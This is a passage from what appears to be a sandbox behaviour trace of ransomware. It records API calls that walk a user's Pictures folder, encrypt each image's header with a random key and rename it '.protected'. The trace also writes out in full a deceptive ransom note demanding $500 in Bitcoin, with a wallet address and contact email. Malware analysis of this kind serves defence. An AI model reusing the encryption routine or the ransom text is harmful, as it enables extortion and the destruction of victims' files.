HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\cc1qgvtc4zzow.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\cc1qgvtc4zzow.jpg.protected")) returned 1 [0092.512] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="Windows") returned -1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="Program Files") returned -1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="Program Files (x86)") returned -1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="$Recycle.bin") returned 1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="System Volume Information") returned -1 [0092.512] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp") returned 97 [0092.512] StrStrIW (lpFirst="eK9PJsIpWbUd.bmp", lpSrch=".protected") returned 0x0 [0092.512] lstrcmpW (lpString1="eK9PJsIpWbUd.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.512] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.512] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ek9pjsipwbud.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp") returned 97 [0092.513] StrStrW (lpFirst="eK9PJsIpWbUd.bmp", lpSrch=".txt") returned 0x0 [0092.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp") returned 97 [0092.513] StrStrW (lpFirst="eK9PJsIpWbUd.bmp", lpSrch=".rar") returned 0x0 [0092.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp") returned 97 [0092.513] StrStrW (lpFirst="eK9PJsIpWbUd.bmp", lpSrch=".zip") returned 0x0 [0092.513] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.514] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.514] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.514] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.514] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.514] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.514] CloseHandle (hObject=0x14c) returned 1 [0092.514] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp.protected") returned 107 [0092.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ek9pjsipwbud.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ek9pjsipwbud.bmp.protected")) returned 1 [0092.515] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="Windows") returned -1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="Program Files") returned -1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="Program Files (x86)") returned -1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="$Recycle.bin") returned 1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="System Volume Information") returned -1 [0092.515] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg") returned 91 [0092.515] StrStrIW (lpFirst="LDad1G.jpg", lpSrch=".protected") returned 0x0 [0092.515] lstrcmpW (lpString1="LDad1G.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0092.516] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.516] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ldad1g.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.516] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg") returned 91 [0092.516] StrStrW (lpFirst="LDad1G.jpg", lpSrch=".txt") returned 0x0 [0092.516] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg") returned 91 [0092.516] StrStrW (lpFirst="LDad1G.jpg", lpSrch=".rar") returned 0x0 [0092.517] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg") returned 91 [0092.517] StrStrW (lpFirst="LDad1G.jpg", lpSrch=".zip") returned 0x0 [0092.517] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.517] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.517] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.517] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.518] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.518] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.518] CloseHandle (hObject=0x14c) returned 1 [0092.518] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg.protected") returned 101 [0092.518] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ldad1g.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ldad1g.jpg.protected")) returned 1 [0092.519] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="Windows") returned -1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="Program Files") returned -1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="Program Files (x86)") returned -1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="$Recycle.bin") returned 1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="System Volume Information") returned -1 [0092.519] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png") returned 100 [0092.519] StrStrIW (lpFirst="ny35po-7N9iv4z8.png", lpSrch=".protected") returned 0x0 [0092.519] lstrcmpW (lpString1="ny35po-7N9iv4z8.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ny35po-7n9iv4z8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png") returned 100 [0092.521] StrStrW (lpFirst="ny35po-7N9iv4z8.png", lpSrch=".txt") returned 0x0 [0092.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png") returned 100 [0092.521] StrStrW (lpFirst="ny35po-7N9iv4z8.png", lpSrch=".rar") returned 0x0 [0092.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png") returned 100 [0092.521] StrStrW (lpFirst="ny35po-7N9iv4z8.png", lpSrch=".zip") returned 0x0 [0092.521] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.522] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.522] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.522] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.522] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.522] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.522] CloseHandle (hObject=0x14c) returned 1 [0092.522] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png.protected") returned 110 [0092.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ny35po-7n9iv4z8.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ny35po-7n9iv4z8.png.protected")) returned 1 [0092.524] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0092.524] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0092.525] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\RESTORE_FILES.txt") returned 98 [0092.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.527] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.527] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0092.527] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.527] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0092.528] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.528] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0092.528] CloseHandle (hObject=0xd8) returned 1 [0092.528] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="Windows") returned -1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="Program Files") returned 1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="Program Files (x86)") returned 1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="$Recycle.bin") returned 1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="System Volume Information") returned 1 [0092.528] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif") returned 86 [0092.528] StrStrIW (lpFirst="vnF7-eNcBmIDoq.gif", lpSrch=".protected") returned 0x0 [0092.528] lstrcmpW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.528] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.528] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vnf7-encbmidoq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif") returned 86 [0092.529] StrStrW (lpFirst="vnF7-eNcBmIDoq.gif", lpSrch=".txt") returned 0x0 [0092.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif") returned 86 [0092.529] StrStrW (lpFirst="vnF7-eNcBmIDoq.gif", lpSrch=".rar") returned 0x0 [0092.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif") returned 86 [0092.529] StrStrW (lpFirst="vnF7-eNcBmIDoq.gif", lpSrch=".zip") returned 0x0 [0092.529] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.529] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.530] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.530] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.530] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.530] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.530] CloseHandle (hObject=0xd8) returned 1 [0092.530] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif.protected") returned 96 [0092.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vnf7-encbmidoq.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vnf7-encbmidoq.gif.protected")) returned 1 [0092.531] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="Windows") returned -1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="Program Files") returned 1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="Program Files (x86)") returned 1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="$Recycle.bin") returned 1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="System Volume Information") returned 1 [0092.531] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg") returned 78 [0092.531] StrStrIW 